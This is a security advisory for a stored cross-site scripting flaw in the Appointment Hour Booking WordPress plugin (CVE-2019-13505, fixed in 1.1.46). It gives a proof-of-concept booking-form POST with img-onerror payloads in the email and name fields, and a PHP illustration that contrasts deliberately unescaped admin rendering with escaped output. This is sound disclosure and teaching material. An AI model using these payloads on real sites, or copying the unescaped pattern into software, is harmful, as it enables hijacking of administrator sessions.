Appointment Hour Booking <= 1.1.45 - Stored Cross-Site Scripting (XSS)



Description
It is possible for an unauthenticated user to inject malicious JavaScript into a booking form, which will then be executed when an authenticated user views the booking in the WordPress admin interface.
Proof of Concept
POST /booking-form/ HTTP/1.1
Host: test.local
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://test.local/booking-form/
Content-Type: multipart/form-data; boundary=---------------------------11713224624340267851833710283
Content-Length: 1809
Connection: close
Cookie: PHPSESSID=fa36a83a2ad7a7fe7b4864024c59bb43; rand_code_1=aa42293c7e2c5cd53a016331a32e4676
Upgrade-Insecure-Requests: 1

-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_pform_psequence"

_1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_appbooking_pform_process"

1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_appbooking_id"

2
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_ref_page"

http://test.local/booking-form/
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="form_structure_1"


-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="refpage_1"

http://test.local/booking-form/
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1"

2019-07-13 12:00/13:00 0 1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1_services"

0
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1_capacity"

0
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="tcostfieldname1_1"

1.00
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="email_1"

"><img src=x onerror=alert(1)><"
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname2_1"

"><img src=x onerror=alert(2)><"
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="hdcaptcha_cp_appbooking_post"

auvoe
-----------------------------11713224624340267851833710283--
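
The PHP below is an added illustration and is not code from the plugin or from the referenced changesets. It shows the rendering pattern the description implies (submitted booking fields concatenated into admin-page HTML without escaping) next to the escaped rendering that neutralises it, using the two payload values from the request above as a constructed sample row. The `$booking` array and the `render_vulnerable`, `render_safe`, `esc` and `contains_markup` functions are hypothetical names chosen for the example; the file runs stand-alone with the `php` CLI.

```php
<?php
// Added illustration, not the plugin's code. Constructed sample row built from
// the two field values submitted in the PoC request (email_1 and fieldname2_1).
$booking = [
    'id'    => 2,
    'email' => '"><img src=x onerror=alert(1)><"',
    'name'  => '"><img src=x onerror=alert(2)><"',
];

// Vulnerable pattern: stored, attacker-controlled strings are placed straight
// into the admin markup. The leading "> closes the value attribute, so the
// <img onerror=...> that follows becomes live markup for whoever views the page.
function render_vulnerable(array $b): string {
    return '<tr><td>' . $b['id'] . '</td>'
         . '<td><input value="' . $b['email'] . '"></td>'
         . '<td>' . $b['name'] . '</td></tr>';
}

// Hardened pattern: escape for the HTML context at output time, every time.
// Inside WordPress the idiomatic calls are esc_attr() for attribute values and
// esc_html() for element content; htmlspecialchars() with ENT_QUOTES is the
// plain-PHP equivalent, used here so the example runs without WordPress loaded.
function esc(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_safe(array $b): string {
    return '<tr><td>' . (int) $b['id'] . '</td>'
         . '<td><input value="' . esc($b['email']) . '"></td>'
         . '<td>' . esc($b['name']) . '</td></tr>';
}

// Triage helper for rows that were stored before the fix: flag any string
// field that still carries raw markup so an administrator can review it.
function contains_markup(array $b): bool {
    foreach ($b as $v) {
        if (is_string($v) && preg_match('/<[a-z!\/]/i', $v)) {
            return true;
        }
    }
    return false;
}

echo render_vulnerable($booking), PHP_EOL; // <img onerror=...> survives as markup
echo render_safe($booking), PHP_EOL;       // rendered inert: &lt;img src=x ...&gt;
var_dump(contains_markup($booking));       // bool(true): this row needs review
```

The fix is applied at the point of output rather than only at submission time: an unauthenticated visitor controls these fields, so an admin page that prints them must treat every stored value as untrusted regardless of how it was validated on the way in. Input-side checks (for example rejecting a value that is not a plausible e-mail address) reduce what gets stored but do not replace output escaping.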

Affects Plugin

Fixed in version 1.1.46

References

CVE 2019-13505
URL https://github.com/ivoschyk-cs/CVE-s/blob/master/Appointment%20Hour%20Booking%20%E2%80%93%20WordPress%20Booking%20Plugin%20--%20stored%20XSS
URL https://plugins.trac.wordpress.org/changeset/2121664/appointment-hour-booking
URL https://plugins.trac.wordpress.org/changeset/2122311/appointment-hour-booking

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher ivoschyk-cs
Submitter Ryan Dewhurst
Submitter Website https://wpscan.io
Submitter Twitter ethicalhack3r
Views 2574
Verified Yes
WPVDB ID 9458

Timeline

Publicly Published 2019-07-09
Added 2019-07-16
Last Updated 2019-07-16
